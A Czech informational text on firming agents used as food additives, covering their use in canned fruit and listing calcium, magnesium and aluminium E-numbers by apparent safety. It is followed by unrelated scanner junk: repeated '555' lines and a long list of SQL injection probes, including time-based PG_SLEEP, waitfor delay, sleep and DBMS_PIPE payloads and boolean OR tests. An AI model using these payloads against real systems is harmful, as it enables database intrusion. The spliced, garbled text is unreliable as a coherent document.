Zpevňující látky pozitivně ovlivňují pevnost a případně také křehkost u mnoha druhů ovoce a zeleniny. V reakci s želírujícími látkami také ztužují gely a želírující směsi. Nejznámější zpevňující látkou je cukr, který ale mezi tyto přídatné látky nepatří.
Zpevňující látky udržují pevnost a strukturu u mnoha druhů ovoce a zeleniny a zároveň v některých případech pozitivně ovlivňují jejich křehkost. Většina zpevňujících látek se dobře rozpouští ve vodě a snadno proniká do upravovaných potravin. Pokud se zpevňující látky přidávají k látkám želírujícím, jsou gely a želírovací směsi tužší.
Používají se především v konzervárenském potravinářském průmyslu. Například u zavařovaných hrušek, konzervovaných meruněk nebo rajčat zajišťují, aby byly měkčí a přitom se vlivem zpracování nerozpadaly.
Zpevňující látky se nachází v několika skupinách přídatných látek a využívají i k jiným účelům např. jako regulátory kyselosti, protipékavé látky, látky zvýrazňující chuť a aroma, sekvestranty a plnidla. Dělí se na
- přírodně identické
- polosyntetické a syntetické
Zpevňující látky přírodně identické a synteticky získané, které jsou pro lidské zdraví bezpečné
- E 263 - Octan vápenatý
- E 333 - Citronany vápenaté (Citráty vápenaté, Dicitronan monovápenatý, Dicitronan divápenatý, Dicitronan trivápenatý, dihydrogencitrát vápenatý)
Uměle získané zpevňující látky syntetické a přírodně identické bez prokázaných nepříznivých vedlejších účinků na organismus člověka
- E 578 - Glukonan vápenatý
- E 526 - Hydroxid vápenatý (Hašené vápno)
- E 529 - Oxid vápenatý (Vápno)
- E 509 - Chlorid vápenatý
- E 511 - Chlorid hořečnatý
- E 516 - Sírany vápenaté (kalciumsulfát, calciumsulfát)
Zpevňující látky které mohou při větší koncentraci mít na zdraví lidí nevhodné účinky
- E 520 - Síran hlinitý
- E 521 - Síran sodno-hlinitý
- E 522 - Síran draselno-hlinitý
- E 523 - Síran hlinito-amonný
Stejně jako u všech ostatních přídatných látek je i používání látek zpevňujících regulováno přísnými předpisy a také kontrolováno. Všechny látky jsou sice v surovinách a potravinách v takovém množství, které při běžné konzumaci lidské zdraví neohrožuje, ale u osob citlivějších na chemické přísady v jídle a dětí se mohou třeba až po nějaké době projevit zdravotní potíže. Vzhledem k používání mnoha různých přídatných látek - tzv. eček - i v jednou druhu potravinářských výrobků je tedy vhodné si důkladně číst jejich složení. V případě, že se v potravině vyskytují pro lidský organismus nevhodné nebo nebezpečné látky by se konzumace měla omezit na nezbytně nutné minimum nebo úplně.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@MVPtn
1%2527%2522
1'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
yILrzkvI')) OR 522=(SELECT 522 FROM PG_SLEEP(15))--
73ZC6Qgf') OR 147=(SELECT 147 FROM PG_SLEEP(15))--
5VtFHZvN' OR 631=(SELECT 631 FROM PG_SLEEP(15))--
-1)) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
-5) OR 305=(SELECT 305 FROM PG_SLEEP(15))--
-5 OR 84=(SELECT 84 FROM PG_SLEEP(15))--
6QtwYS4C'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1" OR 3*2>(0+5+658-658) --
-1" OR 3*2<(0+5+658-658) --
-1" OR 3+658-658-1=0+0+0+1 --
-1" OR 2+658-658-1=0+0+0+1 --
-1' OR 3*2>(0+5+484-484) or 'sQ0VYsOr'='
-1' OR 3*2<(0+5+484-484) or 'sQ0VYsOr'='
-1' OR 3+484-484-1=0+0+0+1 or 'sQ0VYsOr'='
-1' OR 2+484-484-1=0+0+0+1 or 'sQ0VYsOr'='
-1' OR 3*2>(0+5+97-97) --
-1' OR 3*2<(0+5+97-97) --
-1' OR 3+97-97-1=0+0+0+1 --
-1' OR 2+97-97-1=0+0+0+1 --
-1 OR 3*2>(0+5+117-117)
-1 OR 3*2<(0+5+117-117)
-1 OR 3+117-117-1=0+0+0+1
-1 OR 2+117-117-1=0+0+0+1
-1 OR 3*2>(0+5+26-26) --
-1 OR 3*2<(0+5+26-26) --
-1 OR 3+26-26-1=0+0+0+1 --
-1 OR 2+26-26-1=0+0+0+1 --
555
555
555
555
555